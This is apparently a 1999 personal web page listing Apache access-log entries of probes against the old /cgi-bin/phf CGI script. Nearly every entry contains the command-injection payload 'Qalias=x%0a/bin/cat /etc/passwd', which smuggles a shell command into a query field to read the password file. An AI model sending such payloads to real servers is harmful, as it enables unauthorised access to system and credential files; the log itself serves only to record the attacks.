JyAM's PC: phf access

JyAM's PC: phf access
A list try to get passwd file uses /cgi-bin/phf security hole on the Apach web server.
ti18a23-0005.dialup.online.no - - [15/Feb/1999:08:06:53 +0900] "GET /cgi-bin/phf HTTP/1.1" 302 204
dyn1-tnt1-185.indianapolis.in.ameritech.net - - [15/Feb/1999:14:39:24 +0900] "GET /cgi-bin/phf?Qalias=x%0a/bin/cat%20/etc/passwd HTTP/1.1" 302 204
grosz.dada.it - - [17/Feb/1999:07:16:42 +0900] "GET /cgi-bin/phf?Qalias=x%0a/bin/cat%20/etc/passwd HTTP/1.0" 302 192
dialup052.virtualwebsites.com - - [17/Feb/1999:13:02:37 +0900] "GET /cgi-bin/phf?Qalias=x%0a/bin/cat%20/etc/passwd HTTP/1.0" 302 192
host-209-214-130-112.jax.bellsouth.net - - [17/Feb/1999:13:07:00 +0900] "GET /phf?Qalias=x%0a/bin/cat%20/etc/passwd HTTP/1.0" 404 156
spider-wj012.proxy.aol.com - - [18/Feb/1999:03:36:05 +0900] "GET /cgi-bin/phf?Qalias=x%0a/bin/cat%20/etc/passwd HTTP/1.0" 302 192
port184.dialin.keyaccess.nl - - [08/Feb/1999:04:36:52 +0900] "GET /cgi/phf?Qalias=x%0a/bin/cat%20/etc/passwd HTTP/1.1" 404 172
dnr168.smig.net - - [08/Feb/1999:09:05:38 +0900] "GET /cgi-bin/phf?Qalias=x%0a/bin/cat%20/etc/passwd HTTP/1.1" 302 204
usb.jbdnet.com - - [08/Feb/1999:17:41:22 +0900] "GET /cgi-bin/phf?Qalias=x%0a/bin/cat%20/etc/passwd HTTP/1.0" 302 192
dial-19.r17.tnwabg.infoave.net - - [09/Feb/1999:19:06:52 +0900] "GET /cgi-bin/phf?Qalias=x%0a/bin/cat%20/etc/passwd HTTP/1.0" 302 192
jmc.jancomulti.com - - [09/Feb/1999:20:10:34 +0900] "GET /cgi/phf?Qalias=x%0a/bin/cat%20/etc/passwd HTTP/1.1" 404 172
ra067.isis.de - - [12/Feb/1999:06:31:28 +0900] "GET /cgi-bin/phf?Qalias=x%0a/bin/cat%20/etc/passwd HTTP/1.1" 302 204
195.50.4.167 - - [13/Feb/1999:08:23:00 +0900] "GET /cgi-bin/phf?Qalias=x%0a/bin/cat%20/etc/passwd HTTP/1.0" 302 192
webcachew04b.cache.pol.co.uk - - [31/Jan/1999:22:00:31 +0900] "GET /Min/Staff/JyAM/Personal/Food/gunboirichi.html/cgi-bin/phf?Qalias=x%Oa/bin/cat%2 0/ect/passwd HTTP/1.1" 404 222
dialup206-3-8.swipnet.se - - [01/Feb/1999:05:32:12 +0900] "GET /cgi-bin/phf?Qalias=x%0a/bin/cat%20/etc/passwd HTTP/1.0" 302 192
banjo.cs.iitm.ernet.in - - [03/Feb/1999:12:41:48 +0900] "GET /cgi-bin/phf?Qalias=x%0a/bin/cat%20/etc/passwd HTTP/1.0" 302 192
ts33-10.homenet.ohio-state.edu - - [04/Feb/1999:02:24:45 +0900] "GET /cgi-bin/phf?Qalias=x%0a/bin/cat%20/etc/passwd HTTP/1.0" 302 192
spider-ta023.proxy.aol.com - - [06/Feb/1999:09:35:53 +0900] "GET /cgi/phf?Qalias=x%0a/bin/cat%20/etc/passwd HTTP/1.0" 404 160
spider-ta023.proxy.aol.com - - [06/Feb/1999:09:36:33 +0900] "GET /cgi-bin/phf?Qalias=x%0a/bin/cat%20/etc/passwd HTTP/1.0" 302 192
vp236-8.worldonline.nl - - [24/Jan/1999:07:36:47 +0900] "GET /cgi-bin/phf?Qalias=x%0a/bin/cat%20/etc/passwd HTTP/1.0" 302 192
vp236-8.worldonline.nl - - [24/Jan/1999:07:48:55 +0900] "GET /cgi-b n/phf?Qalias=x%0a/bin/cat%20/etc/passwd HTTP/1.0" 302 192
n42.dot.tc - - [25/Jan/1999:13:45:51 +0900] "GET /cgi-bin/phf?Qalias=x%0a/bin/cat%20/etc/passwd HTTP/1.0" 302 192
p3e9c172b.dip.t-online.de - - [26/Jan/1999:07:30:58 +0900] "GET /http://phf.apache.org/phf_abuse_log.cgi HTTP/1.1" 404 204
p3e9c172b.dip.t-online.de - - [26/Jan/1999:07:31:15 +0900] "GET /cgi-bin/phf?Qalias=x%0a/bin/cat%20/etc/passwd HTTP/1.1" 302 204
lv3-p16.telepac.pt - - [28/Jan/1999:06:26:24 +0900] "GET /cgi-bin/phf?Qalias=x%0a/bin/cat%20/etc/passwd HTTP/1.0" 302 192
cache1.jaring.my - - [29/Jan/1999:08:45:15 +0900] "GET /cgi-bin/phf?Qalias=x%0a/bin/cat%20/etc/passwd HTTP/1.0" 302 192
Have a nice day!
Return